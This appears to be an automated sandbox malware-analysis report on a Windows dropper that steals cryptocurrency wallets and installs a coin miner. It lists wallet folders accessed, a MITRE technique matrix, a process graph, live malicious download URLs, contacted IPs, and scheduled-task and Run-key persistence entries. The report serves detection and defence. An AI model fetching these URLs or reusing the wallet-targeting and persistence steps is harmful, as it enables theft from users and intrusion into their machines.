                                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: L:\Users\user\AppData\Roaming\Namecoin\
                                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: M:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\
                                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: M:\Users\user\AppData\Roaming\Exodus\
                                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: M:\Users\user\AppData\Roaming\Electrum\
                                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: M:\Users\user\AppData\Roaming\atomic\Local Storage\
                                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: M:\Users\user\AppData\Roaming\Guarda\Local Storage\
                                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: M:\Users\user\AppData\Roaming\Namecoin\
                                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: N:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\
                                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: N:\Users\user\AppData\Roaming\Exodus\
                                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: N:\Users\user\AppData\Roaming\Electrum\
                                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: N:\Users\user\AppData\Roaming\atomic\Local Storage\
                                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: N:\Users\user\AppData\Roaming\Guarda\Local Storage\
                                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: N:\Users\user\AppData\Roaming\Namecoin\
                                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: O:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\
                                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: O:\Users\user\AppData\Roaming\Exodus\
                                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: O:\Users\user\AppData\Roaming\Electrum\
                                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: O:\Users\user\AppData\Roaming\atomic\Local Storage\
                                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: O:\Users\user\AppData\Roaming\Guarda\Local Storage\
                                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: O:\Users\user\AppData\Roaming\Namecoin\
                                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: P:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\
                                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: P:\Users\user\AppData\Roaming\Exodus\
                                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: P:\Users\user\AppData\Roaming\Electrum\
                                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: P:\Users\user\AppData\Roaming\atomic\Local Storage\
                                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: P:\Users\user\AppData\Roaming\Guarda\Local Storage\
                                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: P:\Users\user\AppData\Roaming\Namecoin\
                                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: Q:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\
                                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: Q:\Users\user\AppData\Roaming\Exodus\
                                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: Q:\Users\user\AppData\Roaming\Electrum\
                                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: Q:\Users\user\AppData\Roaming\atomic\Local Storage\
                                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: Q:\Users\user\AppData\Roaming\Guarda\Local Storage\
                                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: Q:\Users\user\AppData\Roaming\Namecoin\
                                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: R:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\
                                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: R:\Users\user\AppData\Roaming\Exodus\
                                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: R:\Users\user\AppData\Roaming\Electrum\
                                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: R:\Users\user\AppData\Roaming\atomic\Local Storage\
                                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: R:\Users\user\AppData\Roaming\Guarda\Local Storage\
                                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: R:\Users\user\AppData\Roaming\Namecoin\
                                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: S:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\
                                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: S:\Users\user\AppData\Roaming\Exodus\
                                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: S:\Users\user\AppData\Roaming\Electrum\
                                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: S:\Users\user\AppData\Roaming\atomic\Local Storage\
                                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: S:\Users\user\AppData\Roaming\Guarda\Local Storage\
                                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: S:\Users\user\AppData\Roaming\Namecoin\
                                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: T:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\
                                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: T:\Users\user\AppData\Roaming\Exodus\
                                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: T:\Users\user\AppData\Roaming\Electrum\
                                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: T:\Users\user\AppData\Roaming\atomic\Local Storage\
                                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: T:\Users\user\AppData\Roaming\Guarda\Local Storage\
                                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: T:\Users\user\AppData\Roaming\Namecoin\
                                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: U:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\
                                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: U:\Users\user\AppData\Roaming\Exodus\
                                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: U:\Users\user\AppData\Roaming\Electrum\
                                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: U:\Users\user\AppData\Roaming\atomic\Local Storage\
                                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: U:\Users\user\AppData\Roaming\Guarda\Local Storage\
                                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: U:\Users\user\AppData\Roaming\Namecoin\
                                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: V:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\
                                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: V:\Users\user\AppData\Roaming\Exodus\
                                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: V:\Users\user\AppData\Roaming\Electrum\
                                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: V:\Users\user\AppData\Roaming\atomic\Local Storage\
                                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: V:\Users\user\AppData\Roaming\Guarda\Local Storage\
                                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: V:\Users\user\AppData\Roaming\Namecoin\
                                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: W:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\
                                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: W:\Users\user\AppData\Roaming\Exodus\
                                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: W:\Users\user\AppData\Roaming\Electrum\
                                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: W:\Users\user\AppData\Roaming\atomic\Local Storage\
                                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: W:\Users\user\AppData\Roaming\Guarda\Local Storage\
                                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: W:\Users\user\AppData\Roaming\Namecoin\
                                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: X:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\
                                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: X:\Users\user\AppData\Roaming\Exodus\
                                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: X:\Users\user\AppData\Roaming\Electrum\
                                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: X:\Users\user\AppData\Roaming\atomic\Local Storage\
                                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: X:\Users\user\AppData\Roaming\Guarda\Local Storage\
                                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: X:\Users\user\AppData\Roaming\Namecoin\
                                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: Y:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\
                                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: Y:\Users\user\AppData\Roaming\Exodus\
                                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: Y:\Users\user\AppData\Roaming\Electrum\
                                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: Y:\Users\user\AppData\Roaming\atomic\Local Storage\
                                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: Y:\Users\user\AppData\Roaming\Guarda\Local Storage\
                                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: Y:\Users\user\AppData\Roaming\Namecoin\
                                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: Z:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\
                                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: Z:\Users\user\AppData\Roaming\Exodus\
                                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: Z:\Users\user\AppData\Roaming\Electrum\
                                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: Z:\Users\user\AppData\Roaming\atomic\Local Storage\
                                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: Z:\Users\user\AppData\Roaming\Guarda\Local Storage\
                                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: Z:\Users\user\AppData\Roaming\Namecoin\
                                  Source: ApolloPro.scrBinary or memory string: WIN_81
                                  Source: ApolloPro.scrBinary or memory string: WIN_XP
                                  Source: ApolloPro.scrBinary or memory string: WIN_XPe
                                  Source: ApolloPro.scrBinary or memory string: WIN_VISTA
                                  Source: ApolloPro.scrBinary or memory string: WIN_7
                                  Source: ApolloPro.scrBinary or memory string: WIN_8
                                  Source: ApolloPro.scr, 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmpBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 4USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte
                                  Source: Yara matchFile source: 0000002B.00000002.3921696825.000000000050E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 0000002C.00000002.3922955190.0000000002820000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 00000030.00000002.3949785259.0000000003090000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 0000002C.00000002.3922955190.000000000282E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 0000002B.00000002.3921696825.0000000000500000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 00000030.00000002.3949654708.0000000002E10000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 0000002C.00000002.3923072888.00000000029F0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 0000002B.00000002.3921605564.00000000004B0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 00000034.00000002.3988717578.00000000030E0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 00000030.00000002.3949588904.0000000002C90000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 00000034.00000002.3987839867.0000000002C40000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 00000034.00000003.3987493910.0000000002CD5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 00000034.00000002.3987947915.0000000002CC0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 00000030.00000002.3949654708.0000000002E1B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 0000002C.00000002.3922851056.00000000006D0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 00000034.00000002.3988039923.0000000002CD8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 0000002B.00000002.3921957521.0000000002940000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\downloaded_script.bat, type: DROPPED
                                  Source: C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.scrCode function: 18_2_006A696E socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,18_2_006A696E
                                  Source: C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.scrCode function: 18_2_006A6E32 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,18_2_006A6E32

                                  Mitre Att&ck Matrix

                                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                                  Gather Victim Identity Information211
                                  Scripting                                  		2
                                  Valid Accounts                                  		11
                                  Windows Management Instrumentation                                  		211
                                  Scripting                                  		1
                                  Exploitation for Privilege Escalation                                  		111
                                  Disable or Modify Tools                                  		1
                                  OS Credential Dumping                                  		2
                                  System Time Discovery                                  		Remote Services11
                                  Archive Collected Data                                  		1
                                  Ingress Tool Transfer                                  		Exfiltration Over Other Network Medium1
                                  System Shutdown/Reboot
                                  CredentialsDomainsDefault Accounts2
                                  Native API                                  		1
                                  DLL Side-Loading                                  		1
                                  DLL Side-Loading                                  		11
                                  Deobfuscate/Decode Files or Information                                  		21
                                  Input Capture                                  		1
                                  Account Discovery                                  		Remote Desktop Protocol2
                                  Data from Local System                                  		1
                                  Encrypted Channel                                  		Exfiltration Over BluetoothNetwork Denial of Service
                                  Email AddressesDNS ServerDomain Accounts11
                                  Scheduled Task/Job                                  		2
                                  Valid Accounts                                  		2
                                  Valid Accounts                                  		31
                                  Obfuscated Files or Information                                  		Security Account Manager3
                                  File and Directory Discovery                                  		SMB/Windows Admin Shares21
                                  Input Capture                                  		SteganographyAutomated ExfiltrationData Encrypted for Impact
                                  Employee NamesVirtual Private ServerLocal Accounts2
                                  PowerShell                                  		1
                                  Windows Service                                  		21
                                  Access Token Manipulation                                  		12
                                  Software Packing                                  		NTDS27
                                  System Information Discovery                                  		Distributed Component Object Model4
                                  Clipboard Data                                  		Protocol ImpersonationTraffic DuplicationData Destruction
                                  Gather Victim Network InformationServerCloud AccountsLaunchd11
                                  Scheduled Task/Job                                  		1
                                  Windows Service                                  		1
                                  Timestomp                                  		LSA Secrets241
                                  Security Software Discovery                                  		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                                  Domain PropertiesBotnetReplication Through Removable MediaScheduled Task11
                                  Registry Run Keys / Startup Folder                                  		212
                                  Process Injection                                  		1
                                  DLL Side-Loading                                  		Cached Domain Credentials51
                                  Virtualization/Sandbox Evasion                                  		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup Items11
                                  Scheduled Task/Job                                  		121
                                  Masquerading                                  		DCSync4
                                  Process Discovery                                  		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                                  Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/Job11
                                  Registry Run Keys / Startup Folder                                  		2
                                  Valid Accounts                                  		Proc Filesystem11
                                  Application Window Discovery                                  		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                                  Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt51
                                  Virtualization/Sandbox Evasion                                  		/etc/passwd and /etc/shadow1
                                  System Owner/User Discovery                                  		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                                  IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron21
                                  Access Token Manipulation                                  		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                                  Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd212
                                  Process Injection                                  		Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption

                                  Behavior Graph

                                  Hide Legend

                                  Legend:

                                  • Process
                                  • Signature
                                  • Created File
                                  • DNS/IP Info
                                  • Is Dropped
                                  • Is Windows Process
                                  • Number of created Registry Values
                                  • Number of created Files
                                  • Visual Basic
                                  • Delphi
                                  • Java
                                  • .Net C# or VB.NET
                                  • C, C++ or other language
                                  • Is malicious
                                  • Internet
                                  behaviorgraph top1 signatures2 2 Behavior Graph ID: 1569756 Sample: DM6vAAgoCw.exe Startdate: 06/12/2024 Architecture: WINDOWS Score: 100 146 Found malware configuration 2->146 148 Malicious sample detected (through community Yara rule) 2->148 150 Antivirus detection for URL or domain 2->150 152 25 other signatures 2->152 12 DM6vAAgoCw.exe 21 2->12         started        15 wscript.exe 1 2->15         started        18 smartscreen.exe 2->18         started        20 3 other processes 2->20 process3 file4 122 C:\Users\user\AppData\Local\...\Commissioner, PE32 12->122 dropped 124 C:\Users\user\AppData\Local\Temp\Artistic, DOS 12->124 dropped 22 cmd.exe 3 12->22         started        186 Windows Scripting host queries suspicious COM object (likely to drop second stage) 15->186 26 ApolloPro.scr 15->26         started        signatures5 process6 file7 112 C:\Users\user\AppData\Local\Temp\...\Dr.com, PE32 22->112 dropped 164 Suspicious powershell command line found 22->164 166 Tries to download and execute files (via powershell) 22->166 168 Drops PE files with a suspicious file extension 22->168 170 2 other signatures 22->170 28 Dr.com 5 22->28         started        32 cmd.exe 2 22->32         started        34 conhost.exe 22->34         started        36 6 other processes 22->36 signatures8 process9 file10 126 C:\Users\user\AppData\Local\...\ApolloPro.scr, PE32 28->126 dropped 128 C:\Users\user\AppData\Local\...\ApolloPro.js, ASCII 28->128 dropped 130 C:\Users\user\AppData\Local\...\RegAsm.exe, PE32 28->130 dropped 180 Drops PE files with a suspicious file extension 28->180 182 Writes to foreign memory regions 28->182 184 Injects a PE file into a foreign processes 28->184 38 RegAsm.exe 18 28->38         started        43 cmd.exe 1 28->43         started        45 schtasks.exe 1 28->45         started        signatures11 process12 dnsIp13 136 45.74.38.211 M247GB United States 38->136 114 C:\Users\user\AppData\...\smartscreen.exe, PE32+ 38->114 dropped 116 C:\Users\user\AppData\Local\...\runsteal.bat, DOS 38->116 dropped 118 C:\Users\user\AppData\Local\...\download.bat, DOS 38->118 dropped 120 C:\Users\user\AppData\...\checkmiexe.bat, DOS 38->120 dropped 172 Protects its processes via BreakOnTermination flag 38->172 174 Loading BitLocker PowerShell Module 38->174 176 Reads the Security eventlog 38->176 178 Reads the System eventlog 38->178 47 cmd.exe 38->47         started        50 cmd.exe 38->50         started        52 cmd.exe 38->52         started        54 smartscreen.exe 38->54         started        56 conhost.exe 43->56         started        58 schtasks.exe 1 43->58         started        60 conhost.exe 45->60         started        file14 signatures15 process16 signatures17 188 Suspicious powershell command line found 47->188 190 Tries to download and execute files (via powershell) 47->190 192 Adds a directory exclusion to Windows Defender 47->192 62 powershell.exe 47->62         started        64 powershell.exe 47->64         started        67 powershell.exe 47->67         started        79 2 other processes 47->79 70 cmd.exe 50->70         started        72 powershell.exe 50->72         started        75 conhost.exe 50->75         started        77 net.exe 52->77         started        81 4 other processes 52->81 194 Multi AV Scanner detection for dropped file 54->194 196 Machine Learning detection for dropped file 54->196 198 Creates multiple autostart registry keys 54->198 process18 dnsIp19 83 COMSurrogate.exe 62->83         started        140 Loading BitLocker PowerShell Module 64->140 142 Powershell drops PE file 64->142 104 C:\Users\user\AppData\...\COMSurrogate.exe, PE32+ 67->104 dropped 144 Tries to steal Crypto Currency Wallets 70->144 87 xcopy.exe 70->87         started        89 cmd.exe 70->89         started        91 cmd.exe 70->91         started        97 3 other processes 70->97 138 203.161.45.11 VNPT-AS-VNVNPTCorpVN Malaysia 72->138 106 C:\Users\user\...\downloaded_script.bat, DOS 72->106 dropped 93 net1.exe 77->93         started        95 net1.exe 79->95         started        file20 signatures21 process22 file23 108 C:\Users\user\AppData\Local\asm\mi.exe, PE32+ 83->108 dropped 110 C:\Users\user\AppData\...\WinRing0x64.sys, PE32+ 83->110 dropped 154 Multi AV Scanner detection for dropped file 83->154 156 Machine Learning detection for dropped file 83->156 158 Creates multiple autostart registry keys 83->158 160 Sample is not signed and drops a device driver 83->160 162 Tries to harvest and steal browser information (history, passwords, etc) 87->162 99 curl.exe 89->99         started        102 curl.exe 91->102         started        signatures24 process25 dnsIp26 132 172.67.74.152 CLOUDFLARENETUS United States 99->132 134 127.0.0.1 unknown unknown 99->134

                                  Screenshots

                                  Thumbnails

                                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                                  windows-stand

                                  Antivirus, Machine Learning and Genetic Malware Detection

                                  Initial Sample

                                  SourceDetectionScannerLabelLink
                                  DM6vAAgoCw.exe32%ReversingLabsWin32.Backdoor.AutorunsNemesis
                                  DM6vAAgoCw.exe31%VirustotalBrowse

                                  Dropped Files

                                  SourceDetectionScannerLabelLink
                                  C:\Users\user\AppData\Local\asm\mi.exe100%AviraHEUR/AGEN.1311679
                                  C:\Users\user\AppData\Local\Temp\smartscreen.exe100%Joe Sandbox ML
                                  C:\Users\user\AppData\Local\asm\COMSurrogate.exe100%Joe Sandbox ML
                                  C:\Users\user\AppData\Local\asm\mi.exe100%Joe Sandbox ML
                                  C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.scr3%ReversingLabs
                                  C:\Users\user\AppData\Local\Temp\491505\Dr.com3%ReversingLabs
                                  C:\Users\user\AppData\Local\Temp\491505\RegAsm.exe0%ReversingLabs
                                  C:\Users\user\AppData\Local\Temp\Artistic0%ReversingLabs
                                  C:\Users\user\AppData\Local\Temp\Commissioner3%ReversingLabs
                                  C:\Users\user\AppData\Local\Temp\smartscreen.exe42%ReversingLabsByteCode-MSIL.Infostealer.ClipBanker
                                  C:\Users\user\AppData\Local\asm\COMSurrogate.exe71%ReversingLabsByteCode-MSIL.Coinminer.XMRig
                                  C:\Users\user\AppData\Local\asm\WinRing0x64.sys5%ReversingLabs
                                  C:\Users\user\AppData\Local\asm\mi.exe63%ReversingLabsWin64.Trojan.Miner

                                  Unpacked PE Files

                                  No Antivirus matches

                                  Domains

                                  No Antivirus matches

                                  URLs

                                  SourceDetectionScannerLabelLink
                                  https://exodus.lat/ss.bat100%Avira URL Cloudmalware
                                  https://exodus.lat/COMSurrogate.exe100%Avira URL Cloudmalware
                                  https://exodus.lat/COMSurrogat0%Avira URL Cloudsafe

                                  Domains and IPs

                                  Contacted Domains

                                  No contacted domains info

                                  URLs from Memory and Binaries

                                  NameSourceMaliciousAntivirus DetectionReputation
                                  http://www.autoitscript.com/autoit3/JDr.com, 0000000A.00000003.2164317237.00000000038E5000.00000004.00000800.00020000.00000000.sdmp, Dr.com, 0000000A.00000000.2139917691.0000000000DC9000.00000002.00000001.01000000.00000007.sdmp, ApolloPro.scr, 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmpfalse
                                    		high
                                    https://exodus.lat/ss.batRegAsm.exe, 00000016.00000002.4571175471.0000000003217000.00000004.00000800.00020000.00000000.sdmptrue
                                    • Avira URL Cloud: malware
                                    		unknown
                                    https://exodus.lat/COMSurrogate.exeRegAsm.exe, 00000016.00000002.4571175471.0000000003217000.00000004.00000800.00020000.00000000.sdmptrue
                                    • Avira URL Cloud: malware
                                    		unknown
                                    http://nsis.sf.net/NSIS_ErrorErrorDM6vAAgoCw.exe, 00000000.00000002.2118804743.0000000000409000.00000002.00000001.01000000.00000003.sdmp, DM6vAAgoCw.exe, 00000000.00000000.2111219967.0000000000409000.00000002.00000001.01000000.00000003.sdmpfalse
                                      		high
                                      http://schemas.xmlsoap.org/soap/encoding/RegAsm.exe, 00000016.00000002.4571175471.0000000002B81000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        https://exodus.lat/COMSurrogatRegAsm.exe, 00000016.00000002.4571175471.000000000300E000.00000004.00000800.00020000.00000000.sdmptrue
                                        • Avira URL Cloud: safe
                                        		unknown
                                        https://www.autoitscript.com/autoit3/Dr.com, 0000000A.00000003.2164317237.00000000038E5000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameRegAsm.exe, 00000016.00000002.4571175471.0000000002B81000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            http://schemas.xmlsoap.org/wsdl/RegAsm.exe, 00000016.00000002.4571175471.0000000002B81000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high

                                              World Map of Contacted IPs

                                              • No. of IPs < 25%
                                              • 25% < No. of IPs < 50%
                                              • 50% < No. of IPs < 75%
                                              • 75% < No. of IPs

                                              Public IPs

                                              IPDomainCountryFlagASNASN NameMalicious
                                              203.161.45.11
                                              		unknownMalaysia
                                              		45899VNPT-AS-VNVNPTCorpVNfalse
                                              45.74.38.211
                                              		unknownUnited States
                                              		9009M247GBtrue
                                              172.67.74.152
                                              		unknownUnited States
                                              		13335CLOUDFLARENETUSfalse

                                              Private

                                              IP
                                              127.0.0.1

                                              General Information

                                              Joe Sandbox version:41.0.0 Charoite
                                              Analysis ID:1569756
                                              Start date and time:2024-12-06 09:31:52 +01:00
                                              Joe Sandbox product:CloudBasic
                                              Overall analysis duration:0h 13m 11s
                                              Hypervisor based Inspection enabled:false
                                              Report type:full
                                              Cookbook file name:default.jbs
                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                              Number of analysed new started processes analysed:56
                                              Number of new started drivers analysed:0
                                              Number of existing processes analysed:0
                                              Number of existing drivers analysed:0
                                              Number of injected processes analysed:0
                                              Technologies:
                                              • HCA enabled
                                              • EGA enabled
                                              • AMSI enabled
                                              Analysis Mode:default
                                              Analysis stop reason:Timeout
                                              Sample name:DM6vAAgoCw.exe
                                              renamed because original name is a hash value
                                              Original Sample Name:a67e34baacfca98f323981d3b0087f3b.exe
                                              Detection:MAL
                                              Classification:mal100.troj.spyw.evad.mine.winEXE@93/67@0/4
                                              EGA Information:
                                              • Successful, ratio: 33.3%
                                              HCA Information:
                                              • Successful, ratio: 100%
                                              • Number of executed functions: 84
                                              • Number of non-executed functions: 314
                                              Cookbook Comments:
                                              • Found application associated with file extension: .exe
                                              • Override analysis time to 240000 for current running targets taking high CPU consumption

                                              Warnings

                                              • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe, WmiPrvSE.exe
                                              • Execution Graph export aborted for target COMSurrogate.exe, PID 3132 because it is empty
                                              • Execution Graph export aborted for target COMSurrogate.exe, PID 4916 because it is empty
                                              • Execution Graph export aborted for target COMSurrogate.exe, PID 912 because it is empty
                                              • Execution Graph export aborted for target smartscreen.exe, PID 2488 because it is empty
                                              • Execution Graph export aborted for target smartscreen.exe, PID 5172 because it is empty
                                              • Execution Graph export aborted for target smartscreen.exe, PID 712 because it is empty
                                              • Not all processes where analyzed, report is missing behavior information
                                              • Report size exceeded maximum capacity and may have missing behavior information.
                                              • Report size exceeded maximum capacity and may have missing disassembly code.
                                              • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                              • Report size getting too big, too many NtCreateKey calls found.
                                              • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                              • Report size getting too big, too many NtEnumerateKey calls found.
                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                              • Report size getting too big, too many NtReadVirtualMemory calls found.
                                              • Report size getting too big, too many NtSetInformationFile calls found.
                                              • Skipping network analysis since amount of network traffic is too extensive

                                              Simulations

                                              Behavior and APIs

                                              TimeTypeDescription
                                              03:32:42API Interceptor1x Sleep call for process: DM6vAAgoCw.exe modified
                                              03:33:23API Interceptor5310x Sleep call for process: Dr.com modified
                                              03:35:25API Interceptor96834x Sleep call for process: RegAsm.exe modified
                                              03:35:35API Interceptor105x Sleep call for process: powershell.exe modified
                                              03:35:43API Interceptor28082x Sleep call for process: COMSurrogate.exe modified
                                              03:36:10API Interceptor296628x Sleep call for process: smartscreen.exe modified
                                              09:32:48Task SchedulerRun new task: ApolloPro path: wscript s>//B "C:\Users\user\AppData\Local\CreativePixel Tech\ApolloPro.js"
                                              09:35:38AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run SmartScreen C:\Users\user\AppData\Local\Temp\smartscreen.exe
